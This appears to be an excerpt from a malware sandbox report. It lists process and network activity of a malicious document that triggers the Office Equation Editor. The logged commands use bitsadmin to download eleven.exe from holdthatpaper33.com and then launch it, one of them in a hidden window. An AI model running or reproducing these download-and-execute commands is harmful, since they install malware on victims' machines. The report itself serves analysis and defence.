Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer op /priority foreground http://holdthatpaper33.com/bim/eleven.exe %USERPROFILE%\Hpw.exe && start %USERPROFILE%\Hpw.exe
- DNS ASK ho####atpaper33.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer op /priority foreground http://holdthatpaper33.com/bim/eleven.exe %USERPROFILE%\Hpw.exe && start %USERPROFILE%\Hpw.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer op /priority foreground http://holdthatpaper33.com/bim/eleven.exe %HOMEPATH%\Hpw.exe